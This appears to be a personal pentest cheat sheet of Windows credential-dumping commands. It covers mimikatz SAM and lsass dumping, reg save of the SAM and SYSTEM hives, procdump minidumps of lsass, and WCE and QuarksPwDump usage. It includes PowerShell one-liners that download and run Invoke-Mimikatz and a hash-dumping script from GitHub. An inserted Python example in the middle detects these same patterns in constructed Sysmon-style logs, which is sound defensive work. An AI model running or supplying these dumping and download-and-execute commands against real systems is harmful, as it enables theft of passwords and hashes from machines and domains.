Plenty of people have compiled these online, and my pentest handbook has quite a few as well, but I never remember them; writing them out once myself should help them stick.

mimikatz with reg (online)

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

mimikatz with reg (offline)

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

mimikatz with procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

mimikatz with powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');Invoke-Mimikatz

Get hashes with powershell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
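From the defender's side, the reg/procdump/powershell variants above all leave the same footprints in process-creation and process-access telemetry. The following is an added example, not part of the original notes: it parses constructed key=value log records modelled on Sysmon Event ID 1 (process creation) and Event ID 10 (process access) and flags hive saves of SAM/SYSTEM/SECURITY, procdump minidumps of lsass, any process opening lsass.exe with PROCESS_VM_READ, and command lines that invoke mimikatz modules. The field names, the sample records and the rule names are all assumptions made for the example.

```python
"""Detect credential-dumping indicators in constructed Windows event log lines.

Added example (not from the original post). The records below are
constructed and loosely follow Sysmon's field names; they are not real
telemetry.
"""
import re
from dataclasses import dataclass

# Constructed sample records: one benign reg query and one benign
# lsass handle (QUERY_LIMITED_INFORMATION) sit among the dumping patterns.
SAMPLE_LOG = """\
EventID=1 Image=C:\\Windows\\System32\\reg.exe CommandLine="reg save HKLM\\SAM SamBkup.hiv"
EventID=1 Image=C:\\Windows\\System32\\reg.exe CommandLine="reg query HKLM\\SOFTWARE\\Vendor"
EventID=1 Image=C:\\Tools\\procdump64.exe CommandLine="procdump64.exe -accepteula -ma lsass.exe lsass.dmp"
EventID=10 SourceImage=C:\\Tools\\procdump64.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF
EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000
EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
"""

# key=value pairs; values may be double-quoted when they contain spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Windows PROCESS_VM_READ access right; reading LSASS memory requires it.
PROCESS_VM_READ = 0x0010

# Command-line rules (hypothetical rule names), evaluated in this order.
CMDLINE_RULES = [
    ("hive-save", re.compile(r"reg\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.I)),
    ("lsass-minidump", re.compile(r"procdump\S*\s.*-ma\s+lsass", re.I)),
    ("mimikatz-invocation", re.compile(r"Invoke-Mimikatz|sekurlsa::|lsadump::", re.I)),
]


@dataclass
class Alert:
    rule: str
    line_no: int
    detail: str


def parse_record(line: str) -> dict:
    """Turn one key=value line into a dict (quoted values unquoted)."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in FIELD_RE.finditer(line)
    }


def check_record(rec: dict, line_no: int) -> list:
    """Apply the detection rules to a single parsed record."""
    alerts = []
    if rec.get("EventID") == "1":
        cmd = rec.get("CommandLine", "")
        for name, pattern in CMDLINE_RULES:
            if pattern.search(cmd):
                alerts.append(Alert(name, line_no, cmd))
    elif rec.get("EventID") == "10":
        target = rec.get("TargetImage", "").lower()
        granted = int(rec.get("GrantedAccess", "0"), 16)
        # Only read-capable handles to lsass.exe are interesting;
        # 0x1000 (QUERY_LIMITED_INFORMATION) alone is routine.
        if target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ:
            alerts.append(Alert("lsass-access", line_no,
                                f"{rec.get('SourceImage')} access={hex(granted)}"))
    return alerts


def scan(text: str) -> list:
    """Scan a block of log lines and return all alerts in line order."""
    alerts = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            alerts.extend(check_record(parse_record(line), line_no))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.rule}: {a.detail}")
```

The access-mask check is deliberately narrow (PROCESS_VM_READ) so that the many benign processes that open lsass.exe with limited query rights do not fire; in a real deployment the source-image allowlist and the exact masks would be tuned to the environment's Sysmon configuration.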

WCE

wce.exe -l

QuarksPwDump

Notes on techniques for dumping the hashes of every user in the current domain
http://wooyun.jozxing.cc/static/drops/tips-6617.html
Options :
-k --get-system-key
-dhl --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd --dump-hash-domain (NTDS_FILE must be specified)
-db --dump-bitlocker (NTDS_FILE must be specified)
-sf --system-file FILE
-sk --system-key KEY
-nt --ntds-file FILE
-hist --with-history (optional)
-t --output-type JOHN/LC (optional, if no=>JOHN)
-o --output FILE (optional, if no=>stdout)
Example: quarks-pwdump.exe --dump-hash-domain --with-history
quarks-pwdump.exe -dhl

闪电小子 GetPassword
